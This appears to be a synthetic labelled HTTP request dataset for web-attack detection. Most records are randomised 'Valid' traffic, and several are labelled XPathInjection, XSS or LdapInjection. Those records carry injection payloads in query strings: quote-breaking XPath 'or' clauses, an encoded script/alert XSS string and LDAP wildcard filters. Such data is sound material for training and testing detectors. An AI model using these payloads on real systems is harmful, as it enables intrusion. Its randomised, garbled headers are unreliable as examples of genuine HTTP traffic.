GET /qqHYXgxznnK1DqD2c/QVadminobjectImwbG1av/aRo4g/pA/wE0CtN_X/Lqhy/0nuhueirxAajkancprp/vO@KqJnvWPyX@5DY.aspx?iwlogMMV_X-=kb6rtabgoedncvkla&eg1o2xtalthn=e&dllAnmrgcvs=tAteiie9bgeu&wm1nohr1ept=72744&IpeCr=%29++%28+%7C++%28wreo%3Dl6vga*%29&7toasn=hl%40&bi=nyspnRLgrtDapta&eBx=%24gk%3D&nYiqgrait=dchildo HTTP/1.1
Host: www.anelerTt.com:7
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-8-i;q=0.3, euc-kr;q=0.5, iso-10646-ucs-2;q=0.6, iso-8859-9
Accept-Encoding: gzip, gzip, identity;q=0.2
Accept-Language: thtrCt-dNtgwa;q=0.0, dPcmgd-kln;q=0.4, ewa-aimstsi;q=0.1, LvydetAL-ie
Cache-Control: only-if-cached
Client-ip: 61.159.20.181
Cookie: nklt=asuje;evozecoeqaH=4114211;ae5ns=N;p62egn8rdtefg=tcI6;toncrdbytaquor=2993635350;j9wgetTsS=6526805
Cookie2: $Version="74"
Date: Tue, 25 Mar 08 17:41:28 CET
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: *
If-None-Match: *
If-Range: "EMJqZO.82YVLxrXaLI"
Max-Forwards: 525
MIME-Version: 6.6
Pragma: eL='i'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: Basic bm1Ub3k6b2gxTlJyc2M=
Range: 09106-2,27777-,7807-
Referer: /nniew/cmwQd0hh/fa8o/tsoea8em.jpg
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: eynSnwXWy http://www.aekbd.it
UA-CPU: 68000
UA-Disp: 825,0985,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/5.4 www.aetonsd.htm, HTTP/1.3 www.ttos.png, FTP/7.5 www.OrOnsee.jpeg
Transfer-Encoding: deflate
Upgrade: twrizf/4.9, ra8dl/9.5
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37828
Start - Id: 6082
class: Valid
PUT /e1V9QJSSTOKFkFm7c_d/nn0Nbfee7Aq/2xmlLm7J/sYm1inDgeCMtc4a/eI7EF8s8gwA6UT0NZzL/uX.png? HTTP/1.1
Content-Length: 213
Content-Language: gf,ctD
Content-Encoding: gzip
Content-Location: http://www.mxnr.st/mRienb/s9Mus.js
Content-MD5: MXVpNGhlcjNyaHMwcnRFeg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 May 07 06:47:33 GMT
Last-Modified: Tue, 01 Mar 05 04:49:16 UTC
Host: 100.211.131.123
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 246.183.111.215
Cookie: BdklocationLjmh=6;bimsa=mendAeepusttz?;voarsan=nwttmpyromochael3scriptec1n;9N1IQ=nwoihnrl;oSe3=78067030
Cookie2: $Version="7"
Date: Sat, 27 Jun 09 14:32:13 UTC
ETag: W/"NE3aUauoXGYsn5j1u"
Expect: 100-continue
From: etncdt0y@seyoalsi.be
If-Modified-Since: Fri, 29 Jun 07 06:30:11 CET
If-Unmodified-Since: Thu, 22 May 08 23:41:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Mar 06 17:22:15 CET
Max-Forwards: 3574
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: Digest username="aoair"
Range: 8100-26
Referer: http://www.hnkn.uk/tgsotfq/9iSnSonl/suOElzjt/it4Ts.fgf
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: 4raeeTsnVTaxuE
UA-CPU: x86
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 179x0676
Via: 4.5 www.0sbmedro.png:3, 4.4 58.88.240.228, HTTP/6.9 191.173.134.82:210
Transfer-Encoding: compress
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 642 www.cnsss0.jpg "3i0nnehee8xe" 
X-Forwarded-For: 65.50.7.154
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

owiae=aAjwaieoophtpassorr3t ao&ADzm=7539227&D1mC=@Loo&6sboe=noreprsip&8bdDhmorwd=twp&Gcoatit=i&it3m1nirne=4easiIieeyaidanullatfle&fgeoigymtaoii5=54923249&rnh3cmjtdsln=o&eaevuWpo=9n&Xmt16ASphpO=aLeishOrlskexsiaia

End - Id: 6082
Start - Id: 16347
class: Valid
GET /e8n3a/sA9u7X.p8.tqbyDr3Op/mutntHnnlseogreEto/nCMDQ9S7@nz.w.swf?oibcidnurle=30304&orTom7widrmSe=5704&0Is4sco0osihsa=56908331 HTTP/1.1
Host: 19.62.8.169
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, x-mac-arabic, windows-1253;q=0.5
Accept-Encoding: 
Accept-Language: zdr4-slpeaM;q=0.4, ahn2-tet5ics;q=0.7, 4-etAcY
Cache-Control: no-store
Client-ip: 14.36.150.19
Cookie: d4d0etwaE4n1ert=$9kmeac
Cookie2: $Version="88"
Date: Sun, 25 Jul 04 19:21:34 CET
ETag: W/"gxr_NsvJNHs7kUt3"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Wed, 13 Dec 06 23:13:29 CET
If-Unmodified-Since: Fri, 16 Mar 07 12:26:57 GMT
If-Match: *
If-None-Match: "9lAf.0l5iRTbRoi"
If-Range: *
Max-Forwards: 804
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: NTLM MmlpZzZkcG9hb21zc3lkd2V0ZW4xOUhIeWF3eWRudWlhZXVyaTdhYg==
Range: -652120,9-,091-
Referer: http://rebdds.it/8mee/9HhmUkw.mpeg
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 5.3; ma-2e; rv:6.9.7) Gecko/89058265
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7557x889
Via: Aafie/2.2 113.76.143.33, HTTP/1.5 www.4iliiyQi.jpg
Transfer-Encoding: deflate
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16347
Start - Id: 5871
class: Valid
PUT /iRSpmOzGl/s8k_Ao2PHyTK6GMJlHWo/4msrRaw/t9C@/0c2ehIbnrea5elt/ea7lnjir9a/lI@pw/ita6enlfytc.msf? HTTP/1.1
Content-Length: 108
Content-Language: hat
Content-Encoding: gzip
Content-Location: http://weena.ch/Uaiee8te/l0nahos.txt
Content-MD5: eG5TbXAzb2FlZkFydXBjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Dec 09 23:54:29 GMT
Last-Modified: Sat, 18 Jun 05 13:09:33 GMT
Host: 92.123.31.233
Connection: bOsnit
Accept: video/*;q=0.5, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: etde-R4, g-wnlsrss;q=0.6, Ilyn2-tdrrsd1d, a9-Pr2l;q=0.8, ti-paewei;q=0.0
Cache-Control: max-age=99
Client-ip: 66.47.150.12
Cookie: iehhnftq=054;l1REXv.pAJ=0;dAjsak=r ;_AyLVtelnetXmCs5k=u7Zi1K1;a9a1bfao2iqG=ec3
Cookie2: $Version="4"
Date: Fri, 23 Sep 05 20:03:29 UTC
ETag: W/"@fSinWG.5-5JOcj_Z"
Expect: erept
From: mOr4g@othliluhnF.org
If-Modified-Since: Sat, 26 Nov 05 05:56:05 UTC
If-Unmodified-Since: Sun, 10 Sep 06 03:40:55 UTC
If-Match: *
If-None-Match: "AwS9a@ygJ6dGs1O"
If-Range: "rLDm9ORuvxKdax2Iev1"
Max-Forwards: 9038
MIME-Version: 1.9
Pragma: azgMxnE='f'
Proxy-Authorization: Digest username="cubArear"
Authorization: Basic NmVScjp0cGlhNDB2
Range: -6274
Referer: http://www.eay5i.org/ehbco/ico7/gzrchi.asp
TE: gzip;q=0.9,chunked,trailers
Trailer: Host
User-Agent: ts4cse (d9xtWq4dfo; aVtq7Bb; dDvpiamsm)
UA-CPU: x86
UA-Disp: 5175,9978,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 621x973
Via: 9.9 www.QgiscPe.tiff
Transfer-Encoding: identity
Upgrade: bnotd/1.8
Warning: 915 185.109.0.68:7 "iso0iyktgeeyir" 
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 9871025244196928372
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iate=9&5rmMCkdiva1=ssdrss2yswpstCf&roOl=osEfa&sa=lghde9nhbi&6Oueh=(~dhtacces~&L9teYxaDt&nu5=46639644

End - Id: 5871
Start - Id: 2663
class: Valid
GET /dXbxvix-bRBnaI70j.bin?lD-P-vI=akP&oneiaio=acndd&xmlf@xV124jD=hz&sesnaflRg=e%3Ew&4oe=+madminj%7Cw%2Bj&trnvfre0Eji97=i2luSe7nhrqnesh&hserm9aiaergo9h=513012&ncntdmdprck=aouahttphhTuPg&9isartmmwdaNoqn=asntgt&sde=iE&tod=hCFwbrusaeRitT&esjpatasiqeuorh=tcmailg4hdnikimgiOe2inputr&wo3nRMtoei=ayuayoeTee HTTP/1.0
Host: www.tnaect.uk
Connection: close
Accept: application/rtf, image/png
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 34.31.42.238
Cookie: vGf9hzosct=iyrntg;8MUF=mstqahs5i+2;due32eidtSe=rtevalewgetkE?msaeht&tchildIt ;3swa=be;tiOscriptU3FPf=4407217;ncvSTk@g@@W=scy=a
Cookie2: $Version="3"
Date: Fri, 23 Sep 05 13:08:10 GMT
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: hvth
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Wed, 29 Oct 08 10:32:05 UTC
If-Unmodified-Since: Tue, 16 May 06 21:39:09 UTC
If-Match: "llR3YIbSUj4KQkrEV2X"
If-None-Match: "IkSpR0M1q_uBHlI"
If-Range: Tue, 14 Aug 07 17:47:04 GMT
Max-Forwards: 7
MIME-Version: 4.9
Pragma: tK2nwcr=mnqnDno
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: dOywk sie2abod=hgka
Range: -23,-6679
Referer: http://veart.gov/evrSivC/anD1Hk/e08znuim.gz
TE: trailers,chunked;q=0.0
Trailer: Accept-Charset
User-Agent: htee (aM1rhAp)
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: HTTP/3.4 www.feleGsl.tiff, 4.9 118.247.30.11
Transfer-Encoding: identity
Upgrade: dubal/9.7, rce/1.2
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2663
Start - Id: 49817
class: XPathInjection
GET /t8U61./YAg/nhkastnsatt5eww/rc5h3zr4a/ewJdeleterQUWT25lhttp/bB5Ucat1.php3?_gls8ZhzVS=814984&enpahno=rny%27mn61shxae&Cm2b7apumcgt=432&w8wdlguF=27125&btjn7=eB7%27++or+++%28i+%3C++++count%28n5d0d%2Fchild%3A%3Atext%28%29%29+++++and+j++++%3C++count%28ali%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C+++count%28Q3%2Fchild%3A%3A*%29+++++%29+or+%27orspmtl%27++++%3D++++%27++drmeat%27++++or&IJCH1=g8enbkrtate+i&ts7l=iengeishdeyaisa1m&h7p5dre5ririn=%5D HTTP/1.1
Host: 141.70.24.55
Connection: keep-alive
Accept: image/gif;q=0.6, application/postscript;q=0.7, audio/*;q=0.7
Accept-Charset: iso-8859-4;q=0.5, windows-1255
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 146.50.160.76
Cookie: EOtrn7eO8fh=alirtgdcrUiSdOtzt;qVXw=583;a8QCu806eval=acj;cbssl45vnyUw=eOXgerv3__;hrticq1=7383581;nmaecsrCnihas6n=t26i8nf8v8tecmde)~6
Cookie2: $Version="04"
Date: Thu, 22 Dec 05 11:49:37 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: ee0n=eems
From: Eyi42tm7@6degzo.st
If-Modified-Since: Tue, 24 Nov 09 04:04:12 GMT
If-Unmodified-Since: Sat, 05 Aug 06 13:54:45 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 721
MIME-Version: 3.9
Pragma: 39to='d'
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: tieT iapre=tartt
Range: -786962,-08955,08-
Referer: http://htgt.it/8eoiiA/mecto/0mnSsu/efel/tPNstee7.swf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 9.6; cb-bj; rv:6.0.7) Gecko/62181892
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: FTP/7.1 32.26.226.202:7
Transfer-Encoding: gzip
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 144.56.170.95
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49817
Start - Id: 11435
class: Valid
GET /sfsoThcie/wbodygselectQ4tmpbetweenfnrXyT/WHeFBIWQCbody.htm?eTrn=7921168&iiyd=2&H1AErloe8nze=4&5haXetk4enogaey=%2Fda7enetcati%5DRu&aiehnte=idga4iHntmgt&ytmsr=A8adaeh&spes5kyeoe=mpNa%25Iescript&netcatjosock_streamT_R0=eeeet%28&s9=p+elo HTTP/1.0
Host: 125.125.152.29
Connection: keep-alive
Accept: image/*, video/quicktime
Accept-Charset: iso-10646-ucs-2;q=0.4
Accept-Encoding: compress
Accept-Language: Emthn-dTk
Cache-Control: no-store
Client-ip: 212.244.209.81
Cookie: fx0vtRrzvnshB=i4ihVCxODjR;AAeYidtdtetro9=sntqt7ct;oe3njyuaomoatn=bisaavlangena;ieevesemuntaoi=79297;rlMPwinntmailwinntxXZCT=6342;apxs9hweSnaF=926
Cookie2: $Version="19"
Date: Thu, 30 Nov 06 19:46:48 GMT
ETag: "cTTUJSSOB0PiimHNlpk"
Expect: 100-continue
From: tuonehV@pie3e.it
If-Modified-Since: Thu, 23 Mar 06 06:58:06 GMT
If-Unmodified-Since: Tue, 16 Jun 09 08:33:53 GMT
If-Match: "ALhIBXrpM6PZ0nQnGm"
If-None-Match: *
If-Range: Mon, 31 Mar 08 02:47:26 GMT
Max-Forwards: 7
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: u68si atohazra=reig
Authorization: armg lT5rro=sGeocoO
Range: 17-873364,-1915
Referer: /cgttieuz/adlntr/ytebTs/werate/atAn.conf
TE: trailers,deflate
Trailer: Referer
User-Agent: x-b7DK206 http://www.ay95e.be
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1385x852
Via: FTP/2.0 www.hde8tr.shtml, 3.4 www.eaaieatn.tiff
Transfer-Encoding: gzip
Upgrade: AArn2t/8.5, Ccza/1.6, hDt/3.7, e9H/6.2, ghti/3.0
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11435
Start - Id: 47531
class: XSS
GET /ohtWRCYr4HNhXFqF/oEsFJO_@6zO71K/lo6al4wnunrntaaddeoe.shtml?yHv6PdropR8h=4030&elvaSod=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Balert+%28%27h3tEr%27%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E&baVxoPs=taccess_loghtpasswinntg%7EdninsertOaracattis HTTP/1.0
Host: www.gneszeAi.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.1, deflate
Accept-Language: *;q=0.6
Cache-Control: max-age=557
Client-ip: 3.105.200.122
Cookie: 69QiKtp=e;C2s6e=o-
Cookie2: $Version="0"
Date: Wed, 09 Dec 09 09:50:41 GMT
ETag: W/"MF.rOlxIiF0Dx6w"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Wed, 28 Dec 05 20:57:02 CET
If-Unmodified-Since: Mon, 21 Mar 05 16:30:04 UTC
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 17
MIME-Version: 0.2
Pragma: bo=es
Proxy-Authorization: NTLM dWVKZW42Uml3cGhOYWhhbzdrbnRvZWFub1A4aTRhcmlhdQ==
Authorization: NTLM cGx0eWVzcG1oeW1uenNkRmFpY2VuYW9NZ2FibHNjZmlodDJEZmhlb2VvYW5lb0Vo
Range: 924-,916951-
Referer: http://topRuqom.org/urQieeEi/yzefd/araie1/Sdhxt.jsp
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: mX0shd (ychf8G; s1wkYVEhK; r.bdx_m4H8; hUtAZGkY; 1-@Tfyd)
UA-CPU: MIPS
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 8.6 63.210.4.102, FTP/7.1 182.226.25.189
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47531
Start - Id: 1433
class: Valid
GET /sfOe5e6tkaehiu/ydtrbt9ie/m-7k7dHN.TIcrEE/cu/sptr/mochaQ.css?mraarir=gn+hanccdt&o5fHdtInb=8051&edoiatrar9igti1=tdg%40&aiheettope=weodrahlibllen%5DO&h6VjL2=mUoe&6tcu=oadmingre+b6iEei3&giuiNevnus=7&-4qB1F8VzphpM=e2orcdotqavn%24ez&O65admin62VpTTs=szNdasu&6r31=0%26araih%7C%3D&cs=2%5Dau HTTP/1.1
Host: 153.127.97.98
Connection: keep-alive
Accept: application/*;q=0.1, image/gif, image/*
Accept-Charset: x-mac-turkish;q=0.5, iso-8859-2
Accept-Encoding: gzip, deflate;q=0.7, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.3.182.99
Cookie: UTm0yybo=057362;daeodgfidaic=iboqbsdlli;rmlqBbO2v0z=mIG;dnueoolIbl=Dl;ll6OsE2eed0r=eece8nrhihrae
Cookie2: $Version="308"
Date: Thu, 17 Jan 08 04:04:00 GMT
ETag: "PsUpLCmSyIY.MrNi"
Expect: 100-continue
From: oOaeifaU@dedahe.st
If-Modified-Since: Mon, 13 Mar 06 09:54:38 UTC
If-Unmodified-Since: Thu, 26 Oct 06 17:01:40 CET
If-Match: *
If-None-Match: "4BLnBKK0Qz-5.T5"
If-Range: Tue, 28 Feb 06 13:19:52 CET
Max-Forwards: 642
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: NTLM bnN5YWRtbWpyd282SHBlaXhlcmhhYXRtY2hnMFRjdHZk
Range: 6-15763,0058-47
Referer: /qograJen/tknx/d1Cxwi/baAaNue.aspx
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/5.5 (Windows; U; WinNT 6.1; s4-kq; rv:8.3.1) Gecko/24484116
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: FTP/6.7 www.hmiI1s.jpg:7793
Transfer-Encoding: identity
Upgrade: nhr/4.5, ondn/4.1
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 112.212.64.188
X-Serial-Number: 1347008
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1433
Start - Id: 10637
class: Valid
GET /dcc7FyTSFm_tmr7/4np.etWNUQCr/W3dvaAch.html?ehi7i=781&yajennTf=3329465&yd=sruetc%40&BsRyzsHvbrCc=anrstathrsahnnNO&seaensmcgegte=a7qOq%5Ceilt&formnJQC5=514521&YhmpHAjNEbsh=Jctell-&4rt7a=10550233&otie9qlnzrsyZr=316431&lreiFiqfonel9l=98665&hemYpm=ofrdtOD1i&KuKXxe7bD_Fps=suBKJ HTTP/1.1
Host: www.nosmd4R.de
Connection: close
Accept: image/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 109.206.72.98
Cookie: dauycpjalinci=6325139;lrr=ls'hiniinput:2hbef;Aq=irraie;ashemVnehdaa=ca7;aa0vitp=(mr)
Cookie2: $Version="88"
Date: Wed, 11 Jul 07 03:08:50 UTC
ETag: "mkMoih0Lj3Gj6SphZ"
Expect: 5eqtO
From: 2a5l@oierufMLhr.com
If-Modified-Since: Wed, 05 Nov 08 03:47:29 CET
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: *
If-None-Match: "j9xM6zog_geRAk56"
If-Range: Wed, 29 Nov 06 19:26:47 GMT
Max-Forwards: 854
MIME-Version: 2.4
Pragma: hasi=nanO
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: sfdai ts8irn=iOe9
Range: 6-0447,7686-38299,7705-
Referer: http://www.fehtprsp.de/rtci.html
TE: deflate,trailers,chunked
Trailer: Via
User-Agent: Mozilla/0.8 (X11; U; Solaris 2.1; to-po; rv:2.0.4) Gecko/72198797
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: 3.1 www.rwcno.css, HTTP/6.0 5.103.72.20
Transfer-Encoding: gzip
Upgrade: telnx/9.9, iusnr/3.5
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10637
Start - Id: 32480
class: Valid
GET /gVfIs9B@09kQuWt/e4tEd8teiAtChdeeal/zmzuNd7PU31L7mPXKonb/o7eNmabj/uphpBL2t/eTad49lt54qUe.H3/s5cUvr/Fb44fE9GAiC/tU1rrgtsnt34eo/bQnT.asmx?winntWxNgvqwjV7=5&mc=betweenstiT HTTP/1.1
Host: 207.42.30.212
Connection: close
Accept: application/*;q=0.3, image/*;q=0.1, audio/basic
Accept-Charset: hz-gb-2312;q=0.7, koi8-r;q=0.6, x-mac-icelandic
Accept-Encoding: deflate, deflate;q=0.6, identity;q=0.2, identity, gzip;q=0.1
Accept-Language: lzvc-baal5eA, mf-2tesue, s3oi9tb-oran;q=0.0, ocdmqd-os
Cache-Control: iDudS='uS'
Client-ip: 17.24.0.103
Cookie: fiaouoe=tlaukm1es0isIhsi;saZsdgrsRaednth=eIeee vuee
Cookie2: $Version="0"
Date: Wed, 30 May 07 22:50:43 CET
ETag: W/"Ysva.@r0LSaA3MwB-bK"
Expect: 100-continue
From: scowa@lgoehnG.com
If-Modified-Since: Mon, 28 Feb 05 22:34:51 CET
If-Unmodified-Since: Wed, 23 Apr 08 17:01:42 GMT
If-Match: "o2p5SUal3ltIw@N"
If-None-Match: "mBrGdsP9yQpJrYsuWs"
If-Range: Tue, 12 Dec 06 13:24:59 CET
Max-Forwards: 0295
MIME-Version: 9.2
Pragma: r8v=v
Proxy-Authorization: NTLM c3VuYXpsdGxhaG5mcnJlcmd0ZW9zeXRzdGNoaDN5ZGhpbG00ZQ==
Authorization: Basic cGVzc3M6cG9wTXN0Yg==
Range: 9261-,-602,5969-
Referer: http://www.iwbies.gov/pbo0e/i2lmh/AZbe/hfNlOeas.jpeg
TE: trailers,deflate;q=0.9,trailers
Trailer: Date
User-Agent: Mozilla/6.6 (X11; U; Linux i386 9.9; ts-eu; rv:5.8.7) Gecko/59961487
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 630x705
Via: 0.7 182.119.61.74:083, 6.7 www.ieev.tiff
Transfer-Encoding: tEee0
Upgrade: 0te/5.0
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32480
Start - Id: 37846
class: LdapInjection
GET /G0cS1r/adet0HhVQArAn-a8/oS2VRbeJqPwBg/aXHB@MBxYWDB/ntdkyetwwa9es/aJA/atXOXn.Y4nd/rhz1deM2boo/uUxn/1ET9VYZV0divMnullN6A/6atorov/H9NwJbG86Rt.jsp?EhFVechoSmDc=isEa%29%28++%7C+++%28sr%3D*%29&sa=rX9vXBO&7fLkCg_3F01w=Nerotcbrlhailagumc&documentaxapdLa=lwgetg2iframe HTTP/1.1
Host: www.tlc8se.cz
Connection: mtea
Accept: */*
Accept-Charset: iso-8859-4, windows-1253;q=0.9, koi8-r
Accept-Encoding: deflate;q=0.4, compress, gzip, compress, compress;q=0.4
Accept-Language: astlmsmc-trl6
Cache-Control: hgng=wl
Client-ip: 2.231.54.23
Cookie: efioD=a R~Roi'2gyde s%ygxml;ddirtnienc0aeeu=i8oiblweaonDosc;souswee=89869647
Cookie2: $Version="033"
Date: Fri, 25 Aug 06 14:24:58 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Sat, 07 Aug 04 19:27:25 UTC
If-Match: *
If-None-Match: "Q.qUhF_Qgyjhz8Oom"
If-Range: Thu, 22 Jul 04 04:40:26 CET
Max-Forwards: 548
MIME-Version: 0.1
Pragma: fe=sJMl
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: NTLM b2FlZENlbmF5bjVwRW9oRHNMYWhoc29lc3llcm9zbmhhZTFlbG50YWV0aURTVQ==
Range: 853418-,-430
Referer: http://2I5wt7bT.be/latw/hlskNe/iacT/fTntmn.gif
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/2.9 (Windows; U; WinNT 3.9; ki-0y; rv:3.4.0) Gecko/34273151
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: aAgh/4.6 154.170.231.53
Transfer-Encoding: deflate
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37846
Start - Id: 4147
class: Valid
POST /fhtaccesJm6Dx7e@/ht_P70Il-Gz@mg/68GIeg/JopnoAoiene/mxu3gl@pypP4I5s@_PW/oY.log02NGj3gFgroup byb1/0ea/smkedQede7i.jpg? HTTP/1.1
Content-Length: 115
Content-Language: 2j,U,8nnoain
Content-Encoding: compress
Content-Location: http://www.Ibpwhae.de/Saeldai.mdb
Content-MD5: b2Fpbm5uZW5hb29waWtycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Feb 08 20:23:54 UTC
Last-Modified: Sat, 19 Sep 09 11:14:37 UTC
Host: www.geL6.st
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2aes-jkbe;q=0.5, tnau-mesoh;q=0.5, 4snKrind-joO4ne;q=0.0
Cache-Control: max-age=380
Client-ip: 224.142.228.209
Cookie: a3Riydndptbaooe= tdj43ietBhNssa
Cookie2: $Version="5"
Date: Sun, 15 Apr 07 12:44:44 UTC
ETag: W/"_1-3WCEs8-wch4J142"
Expect: 100-continue
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Thu, 08 Apr 10 04:38:22 CET
If-Unmodified-Since: Wed, 14 Jul 04 22:14:09 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Mar 08 17:54:37 UTC
Max-Forwards: 0015
MIME-Version: 7.4
